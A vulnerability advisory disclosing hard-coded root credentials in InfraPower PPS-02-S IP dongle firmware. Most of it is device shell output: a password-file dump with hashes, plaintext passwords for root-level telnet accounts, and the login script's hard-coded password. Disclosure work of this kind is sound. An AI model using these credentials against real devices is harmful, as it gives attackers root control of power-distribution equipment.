InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access Vendor: Austin Hughes Electronics Ltd. Product web page: http://www.austin-hughes.com Affected version: Q213V1 (Firmware: V2395S) Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. Patented IP Dongle provides IP remote access to the PDUs by a true network IP address chain. Only 1xIP dongle allows access to max. 16 PDUs in daisy chain - which is a highly efficient cient application for saving not only the IP remote accessories cost, but also the true IP addresses required on the PDU management. Desc: InfraPower suffers from a use of hard-coded credentials. The IP dongle firmware ships with hard-coded accounts that can be used to gain full system access (root) using the telnet daemon on port 23. Tested on: Linux 2.6.28 (armv5tel) lighttpd/1.4.30-devel-1321 PHP/5.3.9 SQLite/3.7.10 Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5371 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php 27.09.2016 -- # cat /etc/passwd root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh bin:x:1:1:bin:/bin:/bin/sh daemon:x:2:2:daemon:/usr/sbin:/bin/sh adm:x:3:4:adm:/adm:/bin/sh lp:x:4:7:lp:/var/spool/lpd:/bin/sh sync:x:5:0:sync:/bin:/bin/sync shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh operator:x:11:0:Operator:/var:/bin/sh nobody:x:99:99:nobody:/home:/bin/sh admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh # showing accounts in root group: Username: root Password: 8475 -- Username: service Password: ipdongle -- Username: www Password: 9311 -- Username: www2 Password: 9311 # showing other less-privileged accounts: Username: user Password: 8475 -- Username: admin Password: 8475 -------- /mnt/mtd # echo $SHELL /sbin/root_shell.sh /mnt/mtd # cat /sbin/root_shell.sh #!/bin/sh trap "" 2 3 9 24 # check login passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2` if [ "$passWork" = "1" ]; then login_file=/mnt/mtd/root_login now_timestamp=`date +%s` if [ -f $login_file ]; then line=`wc -l $login_file | cut -c 1-9` if [ "$line" != " 0" ] && [ "$line" != " 1" ] && [ "$line" != " 2" ]; then pre_login=`tail -n 3 $login_file | cut -d " " -f 1` pre_result1=`echo $pre_login | cut -d " " -f 1` pre_result2=`echo $pre_login | cut -d " " -f 2` pre_result3=`echo $pre_login | cut -d " " -f 3` if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2` result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp` if [ "$result" != "success" ]; then echo $result exit 0 fi fi fi fi echo -n "password:" read pass if [ "$pass" != "999" ]; then echo "wrong password" echo fail $now_timestamp >> $login_file exit 0 fi echo success $now_timestamp >> $login_file fi /bin/sh /mnt/mtd # -------- /mnt/mtd # ls IMG001.exe boot.old.sh load_config.log main_conf net_conf passwd_conf snmp_conf web_conf PDU3_ini box_conf log_memCheck.txt main_conf.bak net_conf.old port_conf snmpd.conf PDU3_pol info.zip mac_addr me_login ntp_conf private start_service.log -------- /mnt/mtd # df -h Filesystem Size Used Available Use% Mounted on tmpfs 256.0M 4.0K 256.0M 0% /tmp /dev/mtdblock1 1.4M 96.0K 1.3M 7% /mnt/mtd /dev/mtdblock5 1.0M 60.0K 964.0K 6% /mnt/mtd1 /dev/mtdblock6 1.0M 60.0K 964.0K 6% /mnt/mtd2 /dev/mtdblock7 1.0M 60.0K 964.0K 6% /mnt/mtd3 -------- /www # ls -al drwxr-xr-x 5 1013 1014 0 Jan 13 08:41 . drwxr-xr-x 16 root root 0 Nov 28 11:17 .. -rwxr--r-- 1 1013 1014 6875 Apr 22 2014 CSSSource.php -rwxr--r-- 1 1013 1014 291 Apr 22 2014 Config.php -rwxr--r-- 1 1013 1014 1685 Apr 22 2014 ConnPort.php -rwxr--r-- 1 1013 1014 5787 Apr 22 2014 FWUpgrade.php -rwxr--r-- 1 1013 1014 7105 Apr 22 2014 Firmware.php -rwxr--r-- 1 1013 1014 10429 Apr 22 2014 Function.php drwxr-xr-x 2 1013 1014 0 Apr 22 2014 General -rwxr--r-- 1 1013 1014 1407 Apr 22 2014 Header.php -rwxr--r-- 1 1013 1014 6775 Apr 22 2014 IPSettings.php drwxr-xr-x 2 1013 1014 0 Apr 22 2014 Images drwxr-xr-x 2 1013 1014 0 Apr 22 2014 JavaScript -rwxr--r-- 1 1013 1014 408 Apr 22 2014 JavaSource.php -rwxr--r-- 1 1013 1014 849 Apr 22 2014 ListFile.php -rwxr--r-- 1 1013 1014 12900 Apr 22 2014 Login.php -rwxr--r-- 1 1013 1014 355 Apr 22 2014 Logout.php -rwxr--r-- 1 1013 1014 352 Apr 22 2014 Main_Config.php -rwxr--r-- 1 1013 1014 5419 Apr 22 2014 Menu.php -rwxr--r-- 1 1013 1014 942 Apr 22 2014 Menu_3.php -rwxr--r-- 1 1013 1014 4491 Apr 22 2014 Ntp.php -rwxr--r-- 1 1013 1014 23853 Apr 22 2014 OutletDetails.php -rwxr--r-- 1 1013 1014 1905 Apr 22 2014 OutletDetails_Ajax.php -rwxr--r-- 1 1013 1014 48411 Apr 22 2014 PDUDetails.php -rwxr--r-- 1 1013 1014 4081 Apr 22 2014 PDUDetails_Ajax_Details.php -rwxr--r-- 1 1013 1014 1397 Apr 22 2014 PDUDetails_Ajax_Outlet.php -rwxr--r-- 1 1013 1014 19165 Apr 22 2014 PDULog.php -rwxr--r-- 1 1013 1014 29883 Apr 22 2014 PDUStatus.php -rwxr--r-- 1 1013 1014 4418 Apr 22 2014 PDUStatus_Ajax.php -rwxr--r-- 1 1013 1014 7791 Apr 22 2014 PortSettings.php -rwxr--r-- 1 1013 1014 24696 Apr 22 2014 SNMP.php -rwxr--r-- 1 1013 1014 38253 Apr 22 2014 SensorDetails.php -rwxr--r-- 1 1013 1014 27210 Apr 22 2014 SensorStatus.php -rwxr--r-- 1 1013 1014 5984 Apr 22 2014 SensorStatus_Ajax.php -rwxr--r-- 1 1013 1014 40944 Apr 22 2014 System.php -rwxr--r-- 1 1013 1014 4373 Apr 22 2014 UploadEXE.php -rwxr--r-- 1 1013 1014 9460 Apr 22 2014 User.php -rwxr--r-- 1 1013 1014 23170 Apr 22 2014 WriteRequest.php -rwxr--r-- 1 1013 1014 8850 Apr 22 2014 WriteRequest_Ajax.php -rwxr--r-- 1 1013 1014 10811 Apr 22 2014 dball.php -rwxr--r-- 1 1013 1014 771 Apr 22 2014 doupgrate.php -rwxr--r-- 1 1013 1014 76 Apr 22 2014 index.php -rwxr--r-- 1 1013 1014 49 Apr 22 2014 nfs.sh -rwxr--r-- 1 1013 1014 5410 Apr 22 2014 production_test1.php -rwxr--r-- 1 1013 1014 723 Apr 22 2014 vaildate.php -rwxr--r-- 1 1013 1014 611 Apr 22 2014 wiseup.php # Iranian Exploit DataBase = http://IeDb.Ir [2016-11-04]